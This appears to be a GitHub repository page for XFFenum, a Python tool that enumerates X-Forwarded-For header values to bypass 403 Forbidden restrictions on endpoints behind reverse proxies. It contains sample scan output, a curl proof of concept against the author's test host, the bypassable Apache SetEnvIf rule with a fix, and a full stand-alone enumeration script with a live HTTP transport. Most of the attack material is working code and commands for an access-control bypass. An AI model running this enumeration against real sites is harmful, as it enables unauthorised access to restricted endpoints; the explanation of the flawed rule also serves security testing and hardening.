XFFenum - X-Forwarded-For [403 forbidden] enumeration
Language: Python. Author: vavkamil. Branch: master. Latest commit f94e4f3, Aug 15, 2019 (Create FUNDING.yml); XFFenum v1.0 committed Aug 7, 2019.
Files: .github/FUNDING.yml, README.md, requirements.txt, xffenum.py

README.md

XFFenum

A simple tool to bypass 403 Forbidden endpoints behind reverse proxies or load balancers (e.g. Cloudflare) whose access control is based on the client-supplied X-Forwarded-For header. It enumerates candidate addresses through that header, packing several per request, and reports the combinations that stop returning 403.

Based on enumXFF by @infosec_au (see References).

Example

vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
 __  _______ _____                          
 \ \/ /  ___|  ___|__ _ __  _   _ _ __ ___  
  \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \ 
  /  \|  _| |  _|  __/ | | | |_| | | | | | |
 /_/\_\_|   |_|  \___|_| |_|\__,_|_| |_| |_|
 X-Forwarded-For [403 forbidden] enumeration

[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108 

673it [00:34, 21.69it/s]

[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"

Proof of Concept

vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403 
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /xff
on this server.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80</address>
</body></html>

.htaccess

Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess

Why this rule is bypassable: SetEnvIf tests a request header the client can set, and its second argument is an unanchored regular expression, so any request whose X-Forwarded-For contains a match for 192.168.13.37 anywhere (the dots match any character) sets AllowAccess no matter which address actually connected; that is also why several candidates can be packed into one header per request. A proxy that appends to an existing X-Forwarded-For instead of replacing it (Cloudflare appends, and carries the real client address in CF-Connecting-IP) leaves the attacker-supplied value in place. The fix is to derive the client address from the trusted proxy's own header (mod_remoteip with RemoteIPHeader and RemoteIPTrustedProxy, or CF-Connecting-IP behind Cloudflare) and to decide access with Require ip, not with a regex over X-Forwarded-For.
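The enumeration loop behind the Example and Proof of Concept sections, written out as an added, stand-alone example; this is not the project's xffenum.py. It assumes five addresses per request (the README's 65536 addresses and 13108 iterations imply that batch size), uses the README's URL as the target, and replaces the network with a constructed simulated_backend that mimics the .htaccess SetEnvIf regex so the whole thing runs offline. The narrow() step, which re-tests a hit batch one address at a time, goes beyond the README (which reports the whole batch) and is this example's addition. urllib_send is a real transport for live use and is not exercised here.

```python
"""Batched X-Forwarded-For enumeration against a 403 endpoint, with an
offline stand-in for the Apache SetEnvIf rule shown in the Proof of Concept."""
import ipaddress
import math
import re
import ssl
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Iterator, List, Sequence

# Transport signature: (url, headers) -> HTTP status code.
Sender = Callable[[str, Dict[str, str]], int]


def expand_range(spec: str) -> List[str]:
    """Expand a single IP ("10.0.0.5") or a CIDR ("192.168.0.0/16") into every
    address it covers, network and broadcast included, which is why a /16
    yields 65536 entries as in the README output."""
    return [str(ip) for ip in ipaddress.ip_network(spec, strict=False)]


def requests_needed(address_count: int, per_request: int) -> int:
    """Number of HTTP requests when per_request addresses share one header."""
    return math.ceil(address_count / per_request)


def batches(items: Sequence[str], size: int) -> Iterator[List[str]]:
    """Yield consecutive slices of `size` items (the last one may be shorter)."""
    for i in range(0, len(items), size):
        yield list(items[i:i + size])


def xff_header(ips: Iterable[str]) -> str:
    """Serialise a hop list the way proxies do: comma-separated addresses."""
    return ", ".join(ips)


def urllib_send(url: str, headers: Dict[str, str], verify_ssl: bool = True) -> int:
    """Real transport for live use (not exercised offline). Returns the status
    code, treating an HTTPError such as 403 as a normal response."""
    ctx = ssl.create_default_context() if verify_ssl else ssl._create_unverified_context()
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def enumerate_xff(url: str, ip_range: str, send: Sender,
                  per_request: int = 5, forbidden: int = 403) -> List[List[str]]:
    """Send one request per batch of addresses and return every batch whose
    response was not `forbidden`. Batching works because a SetEnvIf-style
    check only asks whether the allowed address appears somewhere in the
    header, so several candidates can be tested in a single request."""
    hits = []
    for batch in batches(expand_range(ip_range), per_request):
        if send(url, {"X-Forwarded-For": xff_header(batch)}) != forbidden:
            hits.append(batch)
    return hits


def narrow(url: str, batch: List[str], send: Sender, forbidden: int = 403) -> List[str]:
    """Re-test each address of a hit batch on its own to isolate the one(s)
    that actually satisfy the server-side check (extra step, not in the README)."""
    return [ip for ip in batch if send(url, {"X-Forwarded-For": ip}) != forbidden]


# Constructed stand-in for the README's .htaccess:
#   Deny from all / SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
# SetEnvIf's value is an unanchored regex, so "." matches any character and
# the match may sit anywhere in the client-controlled header.
ALLOW_PATTERN = re.compile(r"192.168.13.37")


def simulated_backend(url: str, headers: Dict[str, str]) -> int:
    """Offline backend: 200 when the regex matches X-Forwarded-For, else 403."""
    return 200 if ALLOW_PATTERN.search(headers.get("X-Forwarded-For", "")) else 403


if __name__ == "__main__":
    target = "https://xss.vavkamil.cz/xff"   # URL from the README example
    for hit in enumerate_xff(target, "192.168.13.0/24", simulated_backend):
        print("[!] Access granted with", xff_header(hit))
        print("[!] narrowed to", narrow(target, hit, simulated_backend))
```

Against the simulated backend a /24 scan reports the batch 192.168.13.35 to .39 and narrow() isolates 192.168.13.37; the backend also accepts "192x168x13x37" and "192.168.13.37, 203.0.113.5", which is the regex-wildcard and proxy-append behaviour the .htaccess note above warns about. For a live target swap simulated_backend for urllib_send (or a functools.partial of it with verify_ssl=False).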

Usage

vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
 __  _______ _____                          
 \ \/ /  ___|  ___|__ _ __  _   _ _ __ ___  
  \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \ 
  /  \|  _| |  _|  __/ | | | |_| | | | | | |
 /_/\_\_|   |_|  \___|_| |_|\__,_|_| |_| |_|
 X-Forwarded-For [403 forbidden] enumeration

usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]

X-Forwarded-For [403 forbidden] enumeration

optional arguments:
  -h, --help       show this help message and exit
  -u URL           Forbidden URL path to scan
  -i IP_RANGE      Single IP or CIDR range to use
  -t THREADS       number of threads (default: 5)
  --no-verify-ssl  Ignore any and all SSL errors.

Have a nice day :)

References

https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html
